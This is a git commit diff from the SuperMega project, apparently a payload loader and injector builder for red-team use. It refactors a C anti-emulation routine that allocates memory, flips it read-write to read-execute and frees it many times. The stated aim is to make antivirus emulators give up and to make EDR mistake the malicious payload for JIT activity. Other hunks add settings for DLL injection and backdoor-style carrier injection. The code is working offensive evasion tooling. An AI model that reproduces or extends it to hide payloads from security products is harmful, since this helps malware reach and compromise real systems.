admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: improve sirallocalot

Browse Source
This commit is contained in:
Dobin
2024-07-07 12:36:15 +01:00
parent b868c29c7d
commit 4bed8d1a95
4 changed files with 38 additions and 35 deletions
Download Patch File Download Diff File Expand all files Collapse all files
data/source/antiemulation/sirallocalot.c
+21 -28
View File
@@ -1,28 +1,31 @@
#define SIR_ITERATION_COUNT {{SIR_ITERATION_COUNT}}
#define SIR_ALLOC_COUNT {{SIR_ALLOC_COUNT}}
#define SIR_SLEEP_TIME 200 // ms
/* This will allocate SIR_ALLOC_COUNT RW memory regions, /* This will allocate SIR_ALLOC_COUNT RW memory regions,
set them to RX, and free them set them to RX, and free them.
And this SIR_ITERATION_COUNT times.
The idea is that the AV emulator will probably give up, either because SIR_ITERATION_COUNT: Single digits, around 5
of used memory is above maximum, or amount of instructions, or SIR_ALLOC_COUNT: Tripple digits, around 100
number of API calls, or time.
It hopefully also makes the EDR think this program is doing some Memory : SIR_ALLOC_COUNT * payload_length
kind of interpreter or JIT compilation, and not a malicious payload. Cycles : SIR_ALLOC_COUNT * payload_length * SIR_ITERATION_COUNT
Time : SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * payload_length * ?
API calls: SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * 3
The idea is that the AV emulator will probably give up, either because
of used memory is above maximum, or amount of instructions, or
number of API calls, or time.
It hopefully also makes the EDR think this program is doing some
kind of interpreter or JIT compilation, and not a malicious payload.
*/ */
void antiemulation() { void antiemulation() {
void* allocs[SIR_ALLOC_COUNT]; void* allocs[{{SIR_ALLOC_COUNT}}];
DWORD result; DWORD result;
for(int i=0; i<SIR_ITERATION_COUNT; i++) { for(int i=0; i<{{SIR_ITERATION_COUNT}}; i++) {
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
allocs[n] = VirtualAlloc( allocs[n] = VirtualAlloc(
NULL, NULL,
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
@@ -37,33 +40,23 @@ void antiemulation() {
} }
} }
// Write something. for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
/*for(int n=0; n<SIR_ALLOC_COUNT; n++) {
char *alloc = allocs[n];
alloc[0] = 0; // overwrite the first byte
}*/
for(int n=0; n<SIR_ALLOC_COUNT; n++) {
if (VirtualProtect( if (VirtualProtect(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
p_RX, p_RX,
&result) == 0) &result) == 0)
{ {
return 7; return;
} }
} }
Sleep(SIR_SLEEP_TIME);
BOOL bSuccess; BOOL bSuccess;
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
bSuccess = VirtualFree( bSuccess = VirtualFree(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
0x00008000); // MEM_RELEASE 0x00008000); // MEM_RELEASE
} }
} }
} }
data/source/carrier/change_rw_rx/template.c
+2
View File
@@ -22,6 +22,8 @@ char *supermega_payload;
{{plugin_executionguardrail}} {{plugin_executionguardrail}}
{{plugin_virtualprotect}}
int main() int main()
{ {
model/settings.py
+4
View File
@@ -23,6 +23,10 @@ class Settings():
self.dllfunc: str = "" # For DLL injection self.dllfunc: str = "" # For DLL injection
# Anti-debugging
self.sir_iteration_count: int = 5
self.sir_alloc_count: int = 100
# Injectable # Injectable
self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
self.inject_exe_in: FilePath = "" self.inject_exe_in: FilePath = ""
phases/templater.py
+11 -7
View File
@@ -60,15 +60,19 @@ def create_c_from_template(settings: Settings, payload_len: int):
filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format( filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
settings.plugin_antiemulation) settings.plugin_antiemulation)
with open(filepath_antiemulation, "r", encoding='utf-8') as file: with open(filepath_antiemulation, "r", encoding='utf-8') as file:
sir_iteration_count = 5 sir_iteration_count = settings.sir_iteration_count
sir_alloc_count = (int(config.get("sir_target_mem")) / payload_len)+1 sir_alloc_count = settings.sir_alloc_count
# if too large, compiler will add a __checkstk dependency # sir_alloc_count = int((int(config.get("sir_target_mem")) / payload_len))+1
if sir_alloc_count > 256: max_alloc_count = 256
sir_alloc_count = 256 if sir_alloc_count > max_alloc_count:
logging.info(" AntiEmulation target: iterations: {} alloc: {}".format( # if too large, compiler will add a __checkstk dependency
logging.warning("Too large sir allocation count {}, setting to max {}".format(
sir_alloc_count, max_alloc_count
))
sir_alloc_count = max_alloc_count
logging.info("> AntiEmulation: iterations: {} allocs: {}".format(
sir_iteration_count, sir_alloc_count) sir_iteration_count, sir_alloc_count)
) )
plugin_antiemualation = file.read() plugin_antiemualation = file.read()
plugin_antiemualation = Template(plugin_antiemualation).render({ plugin_antiemualation = Template(plugin_antiemualation).render({
'PAYLOAD_LEN': payload_len, 'PAYLOAD_LEN': payload_len,